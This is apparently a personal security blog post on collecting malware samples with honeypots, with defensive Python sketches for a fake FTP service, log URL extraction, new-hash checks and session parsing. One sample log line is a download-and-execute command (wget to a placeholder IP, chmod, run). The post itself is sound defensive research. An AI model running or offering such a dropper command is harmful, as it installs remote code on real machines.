In the days of the caveman, prehistoric humans had to live off the land in order to survive. In the summer, there was plenty of foraging that could be done for easy food that grew on trees and bushes. Collecting sustenance was a matter of life and death, and now, just as it was then, we must collect for our own survival. Except in this day and age, we collect malware instead of sweet, sweet berries. In this Basics post, I’ll be talking into the void about one popular method to get malware samples.
In the last post, I talked about some of the tools I like to use when I already have binaries in hand, but as is tradition around here, I realized that I fucked up and should have written a post about how to get the binaries in the first place. Oopsie Doopsie! So here’s that post…
Now, there are a lot of ways we can get our hands on some malware we can look at. There are all kinds of different places that you can get malware samples for free including a malware zoo, but to me the most fun part of collecting malware is finding binaries with newly seen hash values. You don’t have to be spoiled about the samples you work with like I am, but this is just a personal preference.
At some point, I may do a post on working with a malware zoo, but for right now I’m going to look at two methods I use consistently to get new samples:
I started with honeypots as a collection method because of how much opportunity comes to a well configured honeypot. They’re easy to operate and can pay off in a big way if you work with them enough, but there are a few different things that you should take note of before you jump straight into them.
One thing to keep in mind when it comes to honeypots is that there are different types of honeypots that are good for some situations, and other types that are good for another kind of situation. Knowing which to use and where is a skill that comes with experience, experience that I frankly don’t have yet, so just take my word for it I guess.
When it comes to terminology, “low interaction”, “medium interaction” and “high interaction” are generally used to describe how exposed a service is to attack. This concept can be a little bit foreign to us security types because we tend to subscribe as a whole to the belief that any amount of exposure is just plain bad, and we don’t want anything that looks vulnerable, or that actually is vulnerable, to be exposed to someone with the motivation to exploit it. It’s not a bad attitude to have, but it’s not terribly productive if we’re going against every better instinct we have and decide to dabble with honeypots.
0.25 Low-Interaction Honeypots
Low-interaction honeypots are good for log collection and researching recon TTPs without offering attackers too much to work with. If your interest is in simulating services just to see how attackers might be interacting with them, a low-interaction honeypot might be what you’re looking for. It’s “low interaction” because an attacker isn’t going to be able to do much with the service except interrogate it.
Say that you want to research who on the internet might be interested in a specific version of FTP, but you don’t want to end up exposing your whole system by installing a working version of that service onto your honeypot. (Remember, you’re accountable for whatever happens on this box. Maybe that doesn’t even matter to you, in which case, knock yourself out, dummy! Run the service and see what happens.) You can run a low-interaction honeypot that will look like that vulnerable version of FTP without giving the attacker a shell or any meaningful way to interact with it.
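To make the FTP idea a little more concrete, here’s a minimal sketch of what “looks like FTP but does nothing” can mean. This is not how any particular honeypot platform does it; the banner string, the port (2121), the log file name, and the names `respond` and `FakeFTPHandler` are all my own assumptions for illustration. It greets the visitor, logs every line they send, and refuses every login.

```python
import logging
import socketserver

# Assumption: swap in whatever banner you want to imitate.
FAKE_BANNER = "220 (vsFTPd 2.3.4)"


def respond(command_line: str) -> str:
    """Return a canned FTP reply. Nothing is executed or authenticated."""
    parts = command_line.strip().split(" ", 1)
    verb = parts[0].upper() if parts[0] else ""
    if verb == "USER":
        return "331 Please specify the password."
    if verb == "PASS":
        return "530 Login incorrect."
    if verb == "QUIT":
        return "221 Goodbye."
    return "530 Please login with USER and PASS."


class FakeFTPHandler(socketserver.StreamRequestHandler):
    """Send the banner, log each line the client sends, answer with canned text."""

    def handle(self):
        peer = self.client_address[0]
        self.wfile.write((FAKE_BANNER + "\r\n").encode())
        for raw in self.rfile:
            line = raw.decode("latin-1", errors="replace").strip()
            logging.info("%s sent %r", peer, line)
            reply = respond(line)
            self.wfile.write((reply + "\r\n").encode())
            if reply.startswith("221"):
                break


if __name__ == "__main__":
    logging.basicConfig(
        filename="fake_ftp.log",  # hypothetical log location
        level=logging.INFO,
        format="%(asctime)s %(message)s",
    )
    # Port 2121 is an arbitrary unprivileged port chosen for this sketch.
    with socketserver.ThreadingTCPServer(("0.0.0.0", 2121), FakeFTPHandler) as server:
        server.serve_forever()
```

The whole point is that the log is the product here. The “service” never authenticates anyone and never touches the filesystem, so there isn’t much for a visitor to do besides talk to it.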
Another use case for low-interaction honeypots is inside of a network as “canary” boxes, or hosts that will give you early warning if someone starts taking a little too much interest in them.
Can you still get binaries off of them? In a sense, yes... but not necessarily because the binary was dropped on the system directly. It’s not widely understood how one can find binary material on a honeypot, and the high, medium, low “interaction” language has confused people in the past (read: it confused me), so don’t let it confuse you too.
How exactly can a low-interaction honeypot be used to collect binaries? It’s all in the logs. If you’ve ever participated in a CTF before, you’ve almost certainly had to use an exploit that forces a target to download a file from a specified service. The standard low-effort model for doing this is to force the victim to download from an open web share where your payload (the thing you want to run on the victim’s machine) is hosted. Well guess what buddy, that shit logs. Boy howdy, does it log, and when it does, you’ll be there to see exactly what the attacker was trying to get you to download. Sure would be a shame if someone just went ahead and, ya know... downloaded it. Anyway, that’s a methodology for another blogpost.
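As a rough illustration of the “it’s all in the logs” idea, here’s a small sketch that pulls download URLs out of a logged command line. The regular expression and the function name `extract_urls` are my own assumptions, not part of any honeypot’s tooling, and the sample address comes from a documentation-only IP range. It only finds the URLs; it deliberately does not fetch anything.

```python
import re

# Assumption: attackers' download commands contain a plain http/https/ftp/tftp URL.
# The character class stops at whitespace, quotes, and common shell separators.
URL_PATTERN = re.compile(r"""(?:https?|ftp|tftp)://[^\s'"<>;|]+""", re.IGNORECASE)


def extract_urls(log_line: str) -> list[str]:
    """Return the unique URLs found in one logged command, in order of appearance."""
    seen = []
    for url in URL_PATTERN.findall(log_line):
        if url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    sample = "cd /tmp; wget http://198.51.100.7/bins/x86 -O x; chmod +x x; ./x"
    for url in extract_urls(sample):
        print(url)
```

If you do decide to go get what’s behind those URLs, do it from an isolated analysis box and not from anything you care about.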
0.5 Medium-Interaction Honeypots
As far as honeypot terminology is concerned, “medium-interaction” isn’t used as often as “low” and “high” are. If your mind works the same as mine does, you’re probably thinking, “Hexa, it sounds like a bullshit term,” and yeah, you’d kind of be right.
Is there an easily discernible, clean difference in terminology between low/medium and medium/high? No. No, not really. It’s just an expression of the idea that a medium-interaction service is slightly more open and interactable (not a word) than low-interaction honeypots are, and slightly less than a high-interaction honeypot is. So if you have a honeypot that for all intents and purposes is low-interaction but maybe exposes a service slightly more, but not enough to justify calling it “high-interaction” you might call it a medium-interaction honeypot. It doesn’t really matter, it’s all meaningless bullshit anyway just like life.
0.75 High-Interaction Honeypots
High-interaction honeypots are more interesting for many people, and are probably the ones that you all have more interest in, so I’ll try to spend more time on them throughout this series. If you care less about telling when someone takes an interest in your machine and more about what they do after they’ve decided that your tasty-looking machine is worth the effort, then you might consider running a high-interaction honeypot.
With a high-interaction honeypot, you can run a service that not only appears vulnerable and actually is vulnerable, but also looks and feels like a gummy bear stored in a pocket all day. Soft, warm, and even a little bit gooey when you bite into it. One of the most well-known honeypots in this space is Kippo, the older project that the more modern Cowrie was forked from. (Cowrie’s own documentation calls it “medium to high interaction”, which tells you how fuzzy these labels are.)
These are SSH honeypots that invite attackers to log in with whatever credentials they have (so convincing that you might be as absent-minded as I am and log into the wrong service on occasion and end up getting stuck in your own honeypotted service. Stupid.) Once on the inside, attackers are served a limited shell, limited in the sense that it’s more or less an imitation of an interactive shell with fewer commands available and more limited permissions.
High-interaction honeypots aren’t necessarily more prone to having iffy binaries left on disk, because some low/medium-interaction honeypots may try to automatically pull the files an attacker tries to serve to the honeypot and store them on disk. So depending on the retrieval method your selected honeypot uses for offered malware, you may or may not want to check your local malware traps to make sure you’re getting as much goodness out of them as possible.
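Since the fun part is finding binaries with hashes you haven’t seen before, here’s a hedged sketch of checking a download directory for new samples. The directory layout, the set of known hashes, and the function names `sha256_of` and `new_samples` are assumptions for illustration; where your honeypot actually stores captured files depends on the platform and its configuration.

```python
import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large samples don't have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def new_samples(download_dir: Path, known_hashes: set[str]) -> dict[str, Path]:
    """Map each not-yet-seen SHA-256 to the first file in the directory that has it."""
    fresh = {}
    for path in sorted(download_dir.iterdir()):
        if path.is_file():
            file_hash = sha256_of(path)
            if file_hash not in known_hashes and file_hash not in fresh:
                fresh[file_hash] = path
    return fresh
```

You’d call it with something like `new_samples(Path("downloads"), known)`, where `downloads` and `known` stand in for your own capture directory and whatever list of hashes you’ve already collected.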
High interaction honeypots offer you a look at more host-based TTPs. What scripts are being used after an attacker logs in? What order are the scripts being used in? Are they leaving any clues behind in post-exploitation logging that might give away who they are or what they want? Probably. Like that slop of a boyfriend you’ve probably had (everyone has) who comes over to your house and leaves “wet Kleenex” all over your computer desk, there will be DNA evidence to any given attack that will give you post-exploitation clues, it’s just a matter of putting your analysis hat on and piecing the clues together.
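To get at the “what order are the scripts being used in” question, here’s a sketch that rebuilds each session’s command sequence from a JSON-lines log. The field names (`eventid`, `session`, `timestamp`, `input`) and the `cowrie.command.input` event type are assumptions modeled on Cowrie’s JSON log format; check them against what your own honeypot actually writes before trusting this. The function name `commands_by_session` is mine.

```python
import json
from collections import defaultdict


def commands_by_session(json_lines):
    """Group logged shell commands by session ID, ordered by timestamp."""
    sessions = defaultdict(list)
    for line in json_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip anything that isn't valid JSON
        if not isinstance(event, dict):
            continue
        # Assumption: command events are tagged with this eventid.
        if event.get("eventid") != "cowrie.command.input":
            continue
        session_id = event.get("session", "unknown")
        sessions[session_id].append((event.get("timestamp", ""), event.get("input", "")))
    # ISO 8601 timestamps in the same format sort correctly as plain strings.
    return {sid: [cmd for _, cmd in sorted(entries)] for sid, entries in sessions.items()}
```

Feed it an open log file (a file object iterates line by line) and you get a dictionary of session ID to ordered command list, which makes it a lot easier to spot the same playbook showing up from different source addresses.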
1.0 Losing Control of your honeypots
Oh, your honeypot got hacked? You intentionally made a vulnerable box and someone hacked it. Who ever could have seen that coming?! If you read my blog and decided to wade into these foolhardy waters against my advice, it’s your own darn fault and you’ve probably done something to someone at some point in your life that caused this to happen to you.
Losing control of your honeypot is a fact of life. You’re swimming with sharks, and sometimes the sharks get annoyed when they catch wise to what you’re doing. If you’re new to this, you’re going to lose control of one of your honeypots at some point, but it’s not the end of the world. Things get hacked all the time, and when you’re doing something as ridiculous as inviting script kiddies to scan and compromise your system, don’t be surprised if they land a blow on your intentionally vulnerable box.
2.0 A Final, General Note On Good Honeypot Configurations
Standing up a honeypot is one thing, but making it actually effective is another. If your goal is to find something that hasn’t been seen before or to add value outside of just grabbing the same old crap that has been floating around on the Internet for decades, you’re going to have to figure out how to make your honeypot look like a good target.
It turns out that established platforms like Dionaea can often be fingerprinted by tools like nmap if you leave them in their default configurations, so it really does pay to at least change up the overt banner configurations you have if you’re using a popular honeypot platform.
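One cheap sanity check is to look at your own honeypot the way a scanner would: connect, read the banner, and see whether it still contains the strings from the default install. This is only a sketch, and a banner check is far less thorough than what nmap’s service detection does. The marker strings below are made-up placeholders, not real honeypot defaults; fill them in with whatever you observe from a stock install of your own platform. The function names are also mine.

```python
import socket

# Placeholder values only. Replace with banners you have seen from your own default install.
DEFAULT_MARKERS = ["Example Default FTPd 1.0", "ExampleHoneypot"]


def grab_banner(host: str, port: int, timeout: float = 5.0) -> str:
    """Connect and return whatever the service sends first (empty if it stays silent)."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        try:
            data = conn.recv(1024)
        except socket.timeout:
            data = b""
    return data.decode("latin-1", errors="replace").strip()


def matched_defaults(banner: str, markers=DEFAULT_MARKERS) -> list[str]:
    """Return the known-default strings that still show up in the banner."""
    lowered = banner.lower()
    return [marker for marker in markers if marker.lower() in lowered]


if __name__ == "__main__":
    # Hypothetical target: a honeypot you own, listening locally on port 2121.
    banner = grab_banner("127.0.0.1", 2121)
    print(repr(banner), matched_defaults(banner))
```

An empty list doesn’t mean you’re invisible, it just means you’ve cleared the lowest bar. Only point this at boxes you own.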